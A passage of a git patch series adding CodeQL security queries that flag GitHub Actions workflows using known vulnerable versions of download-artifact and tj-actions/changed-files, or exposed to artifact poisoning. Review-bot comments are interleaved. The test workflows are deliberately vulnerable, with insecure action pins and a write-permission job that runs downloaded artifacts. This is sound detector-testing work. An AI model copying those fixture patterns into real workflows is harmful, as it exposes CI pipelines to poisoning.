+ "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6",
+ "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0",
+ ]
+ or
+ step.getVersion()
+ .matches([
+ "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4",
+ "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e",
+ "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c",
+ "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591",
+ "18f0f591", "18f0f591",
+ ] + "%")
+ )
+select step, "The workflow is using a known vulnerable version ($@) of the $@ action.", step,
+ step.getVersion(), step, step.getCallee()
diff --git a/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
new file mode 100644
index 000000000000..39b1af673a1c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
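Review bot: The version and SHA-prefix lists are hand-maintained and already contain duplicates (`"1.0.0"` twice, `"9bc31d5c"` and `"cbed621e"` twice, `"18f0f591"` three times); QL set semantics make that harmless, but it hints at copy errors and the query gives no way to tell which entries are intended. A comment stating what the list encodes and the first fixed release, e.g. `// Tags and tag commit SHAs of actions/download-artifact before 4.1.7 (the fixed release); regenerate with the gh api command below`, would let a maintainer verify the list against the test workflow, where 4.1.7 and later are marked SECURE. The `matches(... + "%")` on 8-hex-character prefixes covers both abbreviated and full 40-character pins, which is worth saying in the same comment, as is the limitation that a step pinned to a non-tag commit of a vulnerable release is not caught.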
@@ -0,0 +1,23 @@ +name: Test + +on: + issues: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/download-artifact@v1 + - uses: actions/download-artifact@v1.0.0 + - uses: actions/download-artifact@v2 + - uses: actions/download-artifact@v2.1.0 + - uses: actions/download-artifact@v3 + - uses: actions/download-artifact@v3.0.2 + - uses: actions/download-artifact@v4.1.0 + - uses: actions/download-artifact@87c55149d96e628cc2ef7e6fc2aab372015aec85 # v4.1.3 + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 + - uses: actions/download-artifact@v4 # SECURE + - uses: actions/download-artifact@v4.1.7 # SECURE + - uses: actions/download-artifact@v4.1.8 # SECURE + - uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 SECURE + - uses: actions/download-artifact@65a9edc5881444af0b9093a5e628f2fe47ea3b2e # v4.1.7 SECURE diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected new file mode 100644 index 000000000000..0a8c593cd86a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
@@ -0,0 +1,9 @@ +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
| .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref new file mode 100644 index 000000000000..c9bd66e4dd06 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -0,0 +1,2 @@ +Security/CWE-1395/UseOfKnownVulnerableAction.ql + From 483f6229ff5f6cf8e3551588fe94b4e474424c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:02:52 +0200 Subject: [PATCH 439/707] refactor: Create abstract class for known vulnerable actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 55 +++++++++++-------- .../UseOfKnownVulnerableAction.expected | 18 +++--- 2 files changed, 42 insertions(+), 31 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 5767619a5ca4..16404edc5000 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql 
@@ -13,26 +13,37 @@ import actions +abstract class KnownVulnerableAction extends UsesStep { + abstract string getFixedVersion(); +} + +class ActionsDownloadArtifact extends KnownVulnerableAction { + ActionsDownloadArtifact() { + this.getCallee() = "actions/download-artifact" and + ( + this.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + this.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) + } + + override string getFixedVersion() { result = "4.1.7" } +} + // gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate -from UsesStep step -where - step.getCallee() = "actions/download-artifact" and - ( - step.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - step.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) -select step, "The 
workflow is using a known vulnerable version ($@) of the $@ action.", step, - step.getVersion(), step, step.getCallee() +from KnownVulnerableAction step +select step, + "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, + step.getVersion(), step, step.getCallee(), step, step.getFixedVersion() diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 0a8c593cd86a..4749fc358173 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
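Review bot: `KnownVulnerableAction` and `ActionsDownloadArtifact` are declared inside the `.ql` query file, so no other query can import them, and the `ArtifactPoisoningPathTraversal.ql` hunk later on this page pastes the same tag and SHA lists a second time. Moving both classes to a library file under `ql/lib/codeql/actions/security/` (next to `ArtifactPoisoningQuery.qll`) and importing it here keeps a single copy of the vulnerable-version data. The `// gh api ...` provenance comment now sits between the class and the `from` clause, detached from the list it documents; it belongs directly above `ActionsDownloadArtifact`. The abstract class also lacks QLDoc: `/** A step that uses a version of a third-party action with a known vulnerability. */` on the class and `/** Gets the earliest version in which the vulnerability is fixed. */` on `getFixedVersion()`.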
@@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
| .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | From 5f1884aa32780aa6edd0aa3e4ad90fd18f705761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:03:34 +0200 Subject: [PATCH 440/707] feat(queries): Add new queries to report path traversal via artifact poisoning --- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 56 +++++++++++++++++++ .../.github/workflows/artifactpoisoning81.yml | 2 +- .../ArtifactPoisoningPathTraversal.expected | 1 + .../ArtifactPoisoningPathTraversal.qlref | 2 + 4 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql new file mode 100644 index 000000000000..bf7623ef2600 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql 
@@ -0,0 +1,56 @@ +/** + * @name Artifact Poisoning (Path Traversal). + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity error + * @precision very-high + * @security-severity 9 + * @id actions/artifact-poisoning/path-traversal + * @tags actions + * security + * experimental + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.PoisonableSteps + +from UsesStep download +where + download.getCallee() = "actions/download-artifact" and + download.getCallee() = "actions/download-artifact" and + ( + download.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + download + .getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) and + ( + // exists a poisonable upload artifact in the same workflow + exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = poison and + poison.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + or + // upload artifact is not used in the same workflow + not exists(UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload + ) + ) 
+select download, "Potential artifact poisoning" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 7aa190007d8a..768f244c210f 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -25,7 +25,7 @@ jobs: permissions: contents: write steps: - - uses: actions/download-artifact@v4 + - uses: actions/download-artifact@v3 with: name: results - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected new file mode 100644 index 000000000000..10c1cd1ded6d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected @@ -0,0 +1 @@ +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | Potential artifact poisoning | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref new file mode 100644 index 000000000000..7082dbada272 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningPathTraversal.ql + From 6cfec0d24574b46b9aa306547223bcff45f47439 Mon Sep 17 00:00:00 2001 
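Review bot: The conjunct `download.getCallee() = "actions/download-artifact" and` appears twice at the top of the `where` clause; the second copy is redundant and should be dropped. The literal version list also repeats entries (`"1.0.0"` twice, and `"9bc31d5c"`, `"cbed621e"`, `"18f0f591"` more than once in the SHA-prefix list), which is harmless for `=` and `matches` but suggests it was pasted rather than generated, and judging by the UseOfKnownVulnerableAction expected output above it duplicates that query's list, so a shared predicate would keep the two from drifting. The `@description` reads awkwardly; `@description An attacker may be able to poison the workflow's artifacts and influence subsequent steps.` is clearer, and the `@name` should not end with a period.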
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:37:00 +0200 Subject: [PATCH 441/707] feat(queries): Improve Use Of Vulnerable Actions query Move all info to a MaD config file so its easier to mantain Add other vulnerable actions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 14 +- ql/lib/codeql/actions/config/Config.qll | 14 + .../actions/config/ConfigExtensions.qll | 7 + .../codeql/actions/dataflow/FlowSources.qll | 78 +-- .../UseOfKnownVulnerableActionQuery.qll | 23 + ql/lib/ext/config/vulnerable_actions.yml | 641 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- .../CWE-1395/UseOfKnownVulnerableAction.ql | 31 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 23 +- ql/src/qlpack.yml | 2 +- .../UseOfKnownVulnerableAction.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 38 +- 12 files changed, 738 insertions(+), 149 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll create mode 100644 ql/lib/ext/config/vulnerable_actions.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e920a558c73e..e05e3a8c41cb 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1146,7 +1146,9 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + int getMajorVersion() { + result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() + } /** Gets the argument expression for the given key. */ string getArgument(string key) { 
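Review bot: `getMajorVersion()` still yields no result for tags whose suffix is not introduced by a dot, such as `v3-node20` and `v35-sec`, both of which this commit adds to vulnerable_actions.yml: after stripping `^v`, `\\..*` leaves `3-node20`, which `toInt()` rejects. An anchored capture handles both shapes without turning a digit-leading commit SHA into a major version, since `regexpCapture` requires the whole string to match: `result = this.getVersion().regexpCapture("v?([0-9]+)([.-].*)?", 1).toInt()`. The enclosing class `UsesImpl` starts outside the hunk.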
@@ -1192,10 +1194,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ - override string getVersion() { - result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") - } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -1227,12 +1227,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) else none() ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index efd8b26510b7..fb1ae9af14db 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll 
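Review bot: Both `getVersion()` overrides changed on this line (`UsesStepImpl` in the first hunk, `ExternalJobImpl` in the second) now return the captured ref as written, so every caller that compares the result against bare numbers — the literal list in ArtifactPoisoningPathTraversal.ql from the previous commit, for example — silently stops matching unless updated in the same commit; the diffstat lists that file, but its hunk is not visible here, so it is worth confirming. Because the MaD rows mix spellings (`v4.1.6` alongside `1.0.0`) and the extractor keeps whatever the workflow author wrote, a consumer-side normalisation such as `regexpReplaceAll("^v", "")` applied to both sides of the comparison would make the match independent of the `v`. Both enclosing classes start outside the hunks.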
@@ -114,3 +114,17 @@ predicate poisonableActionsDataModel(string action) {
 predicate untrustedEventPropertiesDataModel(string property, string kind) {
 Extensions::untrustedEventPropertiesDataModel(property, kind)
 }
+
+/**
+ * MaD models for vulnerable actions
+ * Fields:
+ * - action: action name
+ * - vulnerable_version: vulnerable version
+ * - vulnerable_sha: vulnerable sha
+ * - fixed_version: fixed version
+ */
+predicate vulnerableActionsDataModel(
+ string action, string vulnerable_version, string vulnerable_sha, string fixed_version
+) {
+ Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version)
+}
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll
index 4a492edeadfb..cc1b5553f5f7
--- a/ql/lib/codeql/actions/config/ConfigExtensions.qll
+++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll
@@ -50,3 +50,10 @@ extensible predicate untrustedEventPropertiesDataModel(string property, string k
 extensible predicate argumentInjectionSinksDataModel(
 string regexp, int command_group, int argument_group
 );
+
+/**
+ * Holds for actions that are known to be vulnerable.
+ */
+extensible predicate vulnerableActionsDataModel(
+ string action, string vulnerable_version, string vulnerable_sha, string fixed_version
+);
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 9f91af470b29..ce2115847495
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
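Review bot: The new QLDoc on `vulnerableActionsDataModel` in Config.qll restates the column names without saying what shape the values take, which matters because the rows added in vulnerable_actions.yml in this commit use a v-prefixed tag for `vulnerable_version` (`v4.1.6`), a full 40-hex commit id for `vulnerable_sha`, and a bare version for `fixed_version` (`4.1.7`, `41`); consumers doing exact string comparison will be bitten by that asymmetry. I would replace the three field lines with `* - vulnerable_version: tag as written in uses:, v-prefixed where the upstream tag is (e.g. v4.1.6)`, `* - vulnerable_sha: full 40-hex commit SHA the tag points to`, `* - fixed_version: version to update to, written without the v prefix (e.g. 4.1.7, 41)`. The same field description belongs on the `extensible predicate` in the ConfigExtensions.qll hunk on this line, whose comment currently only says "Holds for actions that are known to be vulnerable."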
@@ -142,58 +142,14 @@ class DornyPathsFilterSource extends RemoteFlowSource { */ class TJActionsChangedFilesSource extends RemoteFlowSource { TJActionsChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 41 or - u.getVersion() - .matches([ - "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", - "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", - "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", - "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", - "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", - "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", - "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", - "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", - "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", - "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", - "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", - "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", - "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", - "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", - "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", - "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", - "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", - "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", 
